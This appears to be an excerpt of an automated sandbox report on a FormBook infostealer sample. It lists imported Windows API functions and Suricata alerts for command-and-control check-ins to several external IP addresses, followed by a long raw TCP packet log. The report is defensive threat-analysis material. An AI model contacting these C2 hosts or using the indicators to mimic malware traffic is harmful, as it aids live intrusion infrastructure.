COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
SHELL32.dll	DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
OLEAUT32.dll	SafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-30T08:31:13.331450+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	57393	118.139.176.2	80	TCP
2024-09-30T08:31:29.101732+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57394	83.229.19.82	80	TCP
2024-09-30T08:31:31.618833+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57395	83.229.19.82	80	TCP
2024-09-30T08:31:34.277164+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57396	83.229.19.82	80	TCP
2024-09-30T08:31:36.708741+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	57398	83.229.19.82	80	TCP
2024-09-30T08:31:42.232883+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57399	3.33.130.190	80	TCP
2024-09-30T08:31:44.767512+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57400	3.33.130.190	80	TCP
2024-09-30T08:31:47.326886+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57401	3.33.130.190	80	TCP
2024-09-30T08:31:52.799702+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	57402	3.33.130.190	80	TCP
2024-09-30T08:31:59.374257+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57403	114.134.188.182	80	TCP
2024-09-30T08:32:01.923025+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57404	114.134.188.182	80	TCP
2024-09-30T08:32:04.468022+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57405	114.134.188.182	80	TCP
2024-09-30T08:32:06.390016+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	57406	114.134.188.182	80	TCP
2024-09-30T08:32:12.162893+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57407	162.213.249.216	80	TCP
2024-09-30T08:32:14.693993+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57408	162.213.249.216	80	TCP
2024-09-30T08:32:17.338838+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57409	162.213.249.216	80	TCP
2024-09-30T08:32:19.789279+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	57410	162.213.249.216	80	TCP
2024-09-30T08:32:25.310872+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57411	13.248.169.48	80	TCP
2024-09-30T08:32:27.833137+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57412	13.248.169.48	80	TCP
2024-09-30T08:32:30.497158+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57413	13.248.169.48	80	TCP
2024-09-30T08:32:33.016243+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	57414	13.248.169.48	80	TCP
2024-09-30T08:32:38.561031+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57415	3.33.130.190	80	TCP
2024-09-30T08:32:42.025599+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57416	3.33.130.190	80	TCP
2024-09-30T08:32:43.649792+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57417	3.33.130.190	80	TCP
2024-09-30T08:32:46.183410+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	57418	3.33.130.190	80	TCP
2024-09-30T08:32:52.121545+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57419	8.217.17.192	80	TCP
2024-09-30T08:32:54.646775+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57420	8.217.17.192	80	TCP
2024-09-30T08:32:57.449771+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57421	8.217.17.192	80	TCP
2024-09-30T08:33:20.381336+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	57422	8.217.17.192	80	TCP
2024-09-30T08:33:27.017005+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57423	85.159.66.93	80	TCP
2024-09-30T08:33:29.562811+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57424	85.159.66.93	80	TCP
2024-09-30T08:33:32.108704+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57425	85.159.66.93	80	TCP
2024-09-30T08:33:33.823094+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	57426	85.159.66.93	80	TCP
2024-09-30T08:33:39.359479+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57427	13.248.169.48	80	TCP
2024-09-30T08:33:41.932692+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57428	13.248.169.48	80	TCP
2024-09-30T08:33:44.777085+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	57429	13.248.169.48	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 08:31:12.272595882 CEST	57393	80	192.168.2.4	118.139.176.2
Sep 30, 2024 08:31:12.277446032 CEST	80	57393	118.139.176.2	192.168.2.4
Sep 30, 2024 08:31:12.277534962 CEST	57393	80	192.168.2.4	118.139.176.2
Sep 30, 2024 08:31:12.296245098 CEST	57393	80	192.168.2.4	118.139.176.2
Sep 30, 2024 08:31:12.301063061 CEST	80	57393	118.139.176.2	192.168.2.4
Sep 30, 2024 08:31:13.331033945 CEST	80	57393	118.139.176.2	192.168.2.4
Sep 30, 2024 08:31:13.331404924 CEST	80	57393	118.139.176.2	192.168.2.4
Sep 30, 2024 08:31:13.331449986 CEST	57393	80	192.168.2.4	118.139.176.2
Sep 30, 2024 08:31:13.333936930 CEST	57393	80	192.168.2.4	118.139.176.2
Sep 30, 2024 08:31:13.338757038 CEST	80	57393	118.139.176.2	192.168.2.4
Sep 30, 2024 08:31:28.446101904 CEST	57394	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:28.452140093 CEST	80	57394	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:28.452243090 CEST	57394	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:28.463084936 CEST	57394	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:28.468729019 CEST	80	57394	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:29.101605892 CEST	80	57394	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:29.101675034 CEST	80	57394	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:29.101732016 CEST	57394	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:29.967973948 CEST	57394	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:30.986550093 CEST	57395	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:30.991494894 CEST	80	57395	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:30.991596937 CEST	57395	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:31.001455069 CEST	57395	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:31.006664038 CEST	80	57395	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:31.618649006 CEST	80	57395	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:31.618755102 CEST	80	57395	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:31.618833065 CEST	57395	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:32.514873981 CEST	57395	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:33.534698963 CEST	57396	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:33.539654016 CEST	80	57396	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:33.539777040 CEST	57396	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:33.555169106 CEST	57396	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:33.560034037 CEST	80	57396	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:33.560044050 CEST	80	57396	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:33.560070038 CEST	80	57396	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:33.560076952 CEST	80	57396	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:33.560092926 CEST	80	57396	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:33.560101032 CEST	80	57396	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:33.560241938 CEST	80	57396	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:33.560250998 CEST	80	57396	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:33.560259104 CEST	80	57396	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:34.277046919 CEST	80	57396	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:34.277100086 CEST	80	57396	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:34.277163982 CEST	57396	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:35.061844110 CEST	57396	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:36.079927921 CEST	57398	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:36.084870100 CEST	80	57398	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:36.084958076 CEST	57398	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:36.100374937 CEST	57398	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:36.105247974 CEST	80	57398	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:36.708544016 CEST	80	57398	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:36.708575010 CEST	80	57398	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:36.708740950 CEST	57398	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:36.711488008 CEST	80	57398	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:36.711606979 CEST	80	57398	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:36.711669922 CEST	57398	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:36.713802099 CEST	57398	80	192.168.2.4	83.229.19.82
Sep 30, 2024 08:31:36.718574047 CEST	80	57398	83.229.19.82	192.168.2.4
Sep 30, 2024 08:31:41.751444101 CEST	57399	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:41.762928009 CEST	80	57399	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:41.763040066 CEST	57399	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:41.773062944 CEST	57399	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:41.782254934 CEST	80	57399	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:42.232810020 CEST	80	57399	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:42.232882977 CEST	57399	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:43.280514002 CEST	57399	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:43.340078115 CEST	80	57399	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:44.298608065 CEST	57400	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:44.303453922 CEST	80	57400	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:44.303585052 CEST	57400	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:44.312175035 CEST	57400	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:44.317015886 CEST	80	57400	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:44.767436981 CEST	80	57400	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:44.767512083 CEST	57400	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:45.827649117 CEST	57400	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:45.832524061 CEST	80	57400	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:46.846435070 CEST	57401	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:46.851449966 CEST	80	57401	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:46.851546049 CEST	57401	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:46.861073971 CEST	57401	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:46.866151094 CEST	80	57401	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:46.866162062 CEST	80	57401	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:46.866173029 CEST	80	57401	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:46.866257906 CEST	80	57401	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:46.866267920 CEST	80	57401	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:46.866276026 CEST	80	57401	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:46.866285086 CEST	80	57401	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:46.866292953 CEST	80	57401	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:46.866393089 CEST	80	57401	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:47.326692104 CEST	80	57401	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:47.326885939 CEST	57401	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:48.374439955 CEST	57401	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:48.379353046 CEST	80	57401	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:49.392390966 CEST	57402	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:49.400551081 CEST	80	57402	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:49.400676966 CEST	57402	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:49.406636000 CEST	57402	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:49.414649963 CEST	80	57402	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:52.799474001 CEST	80	57402	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:52.799516916 CEST	80	57402	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:52.799701929 CEST	57402	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:52.801922083 CEST	57402	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:31:52.807521105 CEST	80	57402	3.33.130.190	192.168.2.4
Sep 30, 2024 08:31:57.856184959 CEST	57403	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:31:57.862428904 CEST	80	57403	114.134.188.182	192.168.2.4
Sep 30, 2024 08:31:57.862531900 CEST	57403	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:31:57.872931004 CEST	57403	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:31:57.878602028 CEST	80	57403	114.134.188.182	192.168.2.4
Sep 30, 2024 08:31:59.374257088 CEST	57403	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:31:59.420878887 CEST	80	57403	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:00.393975973 CEST	57404	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:32:00.398929119 CEST	80	57404	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:00.399009943 CEST	57404	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:32:00.411463976 CEST	57404	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:32:00.416296005 CEST	80	57404	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:01.923024893 CEST	57404	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:32:01.968930006 CEST	80	57404	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:02.939815044 CEST	57405	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:32:02.944705963 CEST	80	57405	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:02.944818020 CEST	57405	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:32:02.963305950 CEST	57405	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:32:02.968381882 CEST	80	57405	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:02.968400002 CEST	80	57405	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:02.968435049 CEST	80	57405	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:02.968447924 CEST	80	57405	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:02.968460083 CEST	80	57405	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:02.968482018 CEST	80	57405	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:02.968494892 CEST	80	57405	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:02.968517065 CEST	80	57405	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:02.968528986 CEST	80	57405	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:04.012701035 CEST	80	57404	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:04.012777090 CEST	57404	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:32:04.468022108 CEST	57405	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:32:04.473387957 CEST	80	57405	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:04.473457098 CEST	57405	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:32:05.486268044 CEST	57406	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:32:05.491175890 CEST	80	57406	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:05.491240025 CEST	57406	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:32:05.497658014 CEST	57406	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:32:05.502609015 CEST	80	57406	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:06.389854908 CEST	80	57406	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:06.389877081 CEST	80	57406	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:06.390016079 CEST	57406	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:32:06.392554045 CEST	57406	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:32:06.397324085 CEST	80	57406	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:07.420366049 CEST	80	57403	114.134.188.182	192.168.2.4
Sep 30, 2024 08:32:07.420500994 CEST	57403	80	192.168.2.4	114.134.188.182
Sep 30, 2024 08:32:11.542548895 CEST	57407	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:11.547336102 CEST	80	57407	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:11.547415972 CEST	57407	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:11.562030077 CEST	57407	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:11.566802025 CEST	80	57407	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:12.162758112 CEST	80	57407	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:12.162838936 CEST	80	57407	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:12.162893057 CEST	57407	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:13.077347994 CEST	57407	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:14.095944881 CEST	57408	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:14.101969957 CEST	80	57408	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:14.102046967 CEST	57408	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:14.111445904 CEST	57408	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:14.117691040 CEST	80	57408	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:14.693823099 CEST	80	57408	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:14.693855047 CEST	80	57408	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:14.693993092 CEST	57408	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:15.624218941 CEST	57408	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:16.642765045 CEST	57409	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:16.647672892 CEST	80	57409	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:16.650866032 CEST	57409	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:16.662796021 CEST	57409	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:16.667743921 CEST	80	57409	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:16.667754889 CEST	80	57409	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:16.667773008 CEST	80	57409	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:16.667783022 CEST	80	57409	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:16.667793036 CEST	80	57409	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:16.667812109 CEST	80	57409	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:16.667869091 CEST	80	57409	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:16.667877913 CEST	80	57409	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:16.667912960 CEST	80	57409	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:17.336055040 CEST	80	57409	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:17.336072922 CEST	80	57409	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:17.338838100 CEST	57409	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:18.171114922 CEST	57409	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:19.190761089 CEST	57410	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:19.195699930 CEST	80	57410	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:19.198858976 CEST	57410	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:19.204807997 CEST	57410	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:19.209701061 CEST	80	57410	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:19.789115906 CEST	80	57410	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:19.789177895 CEST	80	57410	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:19.789278984 CEST	57410	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:19.791928053 CEST	57410	80	192.168.2.4	162.213.249.216
Sep 30, 2024 08:32:19.796705961 CEST	80	57410	162.213.249.216	192.168.2.4
Sep 30, 2024 08:32:24.821767092 CEST	57411	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:24.826586008 CEST	80	57411	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:24.830796003 CEST	57411	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:24.840087891 CEST	57411	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:24.845506907 CEST	80	57411	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:25.305789948 CEST	80	57411	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:25.310872078 CEST	57411	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:26.346354008 CEST	57411	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:26.351227045 CEST	80	57411	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:27.364797115 CEST	57412	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:27.371619940 CEST	80	57412	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:27.373068094 CEST	57412	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:27.386893988 CEST	57412	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:27.391697884 CEST	80	57412	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:27.833080053 CEST	80	57412	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:27.833137035 CEST	57412	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:28.892751932 CEST	57412	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:28.897607088 CEST	80	57412	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:29.909198046 CEST	57413	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:30.016926050 CEST	80	57413	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:30.016999960 CEST	57413	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:30.028901100 CEST	57413	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:30.033763885 CEST	80	57413	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:30.033777952 CEST	80	57413	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:30.033823013 CEST	80	57413	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:30.033835888 CEST	80	57413	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:30.033843994 CEST	80	57413	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:30.033871889 CEST	80	57413	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:30.034006119 CEST	80	57413	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:30.034014940 CEST	80	57413	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:30.034049034 CEST	80	57413	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:30.496126890 CEST	80	57413	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:30.497158051 CEST	57413	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:31.531966925 CEST	57413	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:31.536807060 CEST	80	57413	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:32.549361944 CEST	57414	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:32.554214001 CEST	80	57414	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:32.557013988 CEST	57414	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:32.563107014 CEST	57414	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:32.568011045 CEST	80	57414	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:33.016081095 CEST	80	57414	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:33.016102076 CEST	80	57414	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:33.016242981 CEST	57414	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:33.020926952 CEST	57414	80	192.168.2.4	13.248.169.48
Sep 30, 2024 08:32:33.025758028 CEST	80	57414	13.248.169.48	192.168.2.4
Sep 30, 2024 08:32:38.075297117 CEST	57415	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:32:38.082022905 CEST	80	57415	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:38.082093000 CEST	57415	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:32:38.093266964 CEST	57415	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:32:38.099884987 CEST	80	57415	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:38.557595968 CEST	80	57415	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:38.561031103 CEST	57415	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:32:39.608618021 CEST	57415	80	192.168.2.4	3.33.130.190
Sep 30, 2024 08:32:39.613782883 CEST	80	57415	3.33.130.190	192.168.2.4
Sep 30, 2024 08:32:40.627202034 CEST	57416	80	192.168.2.4	3.33.130.190
